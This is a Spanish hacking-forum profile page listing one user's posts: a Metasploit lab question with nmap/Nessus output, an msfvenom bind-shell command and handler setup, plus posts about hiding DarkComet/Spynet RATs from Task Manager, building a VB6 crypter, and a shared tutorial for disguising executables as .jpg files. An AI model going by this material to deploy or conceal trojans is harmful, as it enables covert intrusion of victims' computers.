Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - mcr_bkn

Páginas: [1]
1
HOla amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y
meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas
en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener
acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:





http://www.subirimagenes.net/i/131027114712988939.jpg


Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!

2
Amigos, tengo una consulta estoy comenzando con las pruebas de pentest y tengo una duda, para comenzar varios tutos recomiendan win xp sp2 pero sera recomendable empezar a la fecha con win xp sp3??? y si alguien tiene las ISO que pueda compartir para descargarlas, estas deben tener alguna configuraciòn en especial??

3
Estimado amigos, quería hacer una consulta a ver si me pueden ayudar. Siempre he tenido problemas con los RAT (Spynet y Darkcomet) en el sentido cuando el remoto lo ejecuta 2 o 3 veces... tengo que ir a administrador de tareas y cerrar un server para que pueda entrar a windows, llegue a la conclusión (ratifiquen si estoy en lo cierto), que escribe en el mismo registro de windows la veces que se ejecuta y esto causa varios problemas (ver fotos adjuntas). A ver si me pueden ayudar a solucionar esto, tenia pensado en agregarle al crypter (realizado en vb6) un modulo que verifique si esta escrito en el registro no ejecute el server, googleando encontre esto: http://foro.elhacker.net/programacion_vb/modificar_regedit_usando_visual_basic-t245654.0.html publicado por karcrack, pero no logro hacerlo funcionar para lo que yo quiero... bueno eso... espero puedan ayudarme y de ante mano muchas gracias!!!



http://subefotos.com/ver/?6f72c15c0870f1f08c004871c55f1263o.jpg



http://subefotos.com/ver/?597060d4af64f1a32a728f8cb3969aaeo.jpg

4
Hola amigos del foro, espero puedan ayudarme. Hce poco me compre un pc nuevo :D y a la sorpresa de querer instalarle otro SO (backtrack5) me encontre con la sorpresa que no se podia. Investigue y me encontre q los nuavos pc (con windows 8) tiene UEFI boot, googleando encontre que ubuntu 12.10 es compatible con UEFI, pero yo queria probar backtrack 5. No he encontrado nada concreto a ver si alguien que le haya pasado lo mismo pueda ayudarme.

Saludos!!!

5
Tutoriales y Manuales de Malwares / Spofear .exe por .jpg por McR
« en: Enero 03, 2013, 12:53:38 am »
Estimados amigos, alomejor un tema un poco repetitivo pero le comparto un video que hice hace un tiempo (para principiantes) y lo queria compartir aca en underc0de!!! :) bueno este método tiene mi estampa pero sacando ideas de varios lados...  bueno acá esta el link...

Link: http://www.mediafire.com/?o5goy7121jidot

Pass: mcr_hack


Nota: Les aconsejo mejorar la configurar del Sfx Compiler ya que la q esta en el vídeo creara una carpeta en C: hay una opción para guardar los archivos en la carpeta Temp, no lo quise hacer de nuevo ya q me dio un poco de flojera jejejeje... Bueno es mi primer vídeo tutorial espero les sirva Saludos!!!

6
Dudas y pedidos generales / [SOLUCIONADO] Ocultar troyano adm. de tarea
« en: Diciembre 04, 2012, 04:01:29 am »
Estimados amigos, probando con darkcomet 5.3.1 desde mi pc escritorio, me di cuenta que en el administrador de tareas aparece el troyano (en aplicaciones y procesos) quiero saber si el RAT tiene una opcion para ocultarlo o si esto depende del crypter... a ver si me pueden ayudar..!!! Saludos...

7
Presentaciones / Saludos!
« en: Noviembre 02, 2012, 03:06:00 pm »
Amigos mios, un saludos a todos los del foro, me gusta todo lo q tiene q ver con RAT y moddeaer crypter... vengo a aprender de los usuarios y ademas aportar los conocimientos que he adquirido hasta el momento, espero tener una buena acogida...


Páginas: [1]